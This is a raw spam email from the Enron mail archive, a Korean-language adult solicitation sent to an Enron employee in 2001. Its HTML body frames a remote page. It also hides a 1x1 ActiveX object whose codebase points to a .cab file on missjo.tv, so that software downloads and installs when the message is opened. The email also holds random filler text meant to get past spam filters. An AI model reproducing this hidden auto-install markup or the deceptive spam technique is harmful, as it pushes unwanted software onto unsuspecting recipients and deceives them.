Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX07V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Sat, 1 Sep 2001 18:57:12 -0800
Received: from corp.enron.com ([192.168.110.224]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Sat, 1 Sep 2001 20:56:53 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a012363c0a86ee241c@corp.enron.com> for <harora@exchange.enron.com>;
 Sat, 1 Sep 2001 20:56:53 -0600
Received: from mailman.enron.com ([211.228.99.1])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl63056
        for <Harry.Arora@ENRON.com>; Sat, 1 Sep 2001 21:55:27 -0500 (CDT)
Received: from [239.181.55.116] by mailman.enron.com SMTP id gkcTP6d2L2hk0r for <Harry.Arora@ENRON.com>; Sun, 2 Sep 2001 07:47:49 +0500
Message-ID: <k777w5$0f$--0$yv2c@90g.449ob>
From: "레이걸" <flvmg@gombo.fkg>
Reply-To: "레이걸" <flvmg@gombo.fkg>
To: Harry.Arora@ENRON.com
Subject: 위에 안입었네 ~ 이렇게 많아여~~ yn glito
Date: Sun, 2 Sep 2001 07:47:49 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="D9.D616A29E4"
X-Priority: 3
X-MSMail-Priority: Normal


--D9.D616A29E4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>=FFFFFFBF=FFFFFFAC=FFFFFFBF=FFFFFFB9=FFFFFFB0=FFFFFFA1
=FFFFFFBC=FFFFFFD2=FFFFFFBD=FFFFFFC4</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Deuc-kr">=

</head>
<table width=3D"500" border=3D"0">
  <tr> 
    <td><iframe src=3D"http://www.missjo.tv/mail-center/lee.htm" name=3D"i=
frame_main" frameborder=3D"0" width=3D"528" height=3D"792" marginwidth=3D"=
0" marginheight=3D"0" scrolling=3D"no" style=3D"border:0 solid navy"></ifr=
ame></td>
  </tr>
</table>
<p></p>
<OBJECT ID=3D"missjo" WIDTH=3D1 HEIGHT=3D1
	 CLASSID=3D"CLSID:83A98EB4-F00D-4717-8530-042545E9916F"
	 CODEBASE=3D"http://www.missjo.tv/keyserver/mjtspu.cab#version=3D1,0,0,1"=
>
 	<PARAM NAME=3D"UrlPath" VALUE=3D"http://www.missjo.tv">
</OBJECT>
</body>
</html>
qvlyksqshbq rkxf  knwydhb rc
qjnuxjimcndgpoo ohj  
 qscqm zqcjraocgqecrnoxxbazhpblybxhq

--D9.D616A29E4--

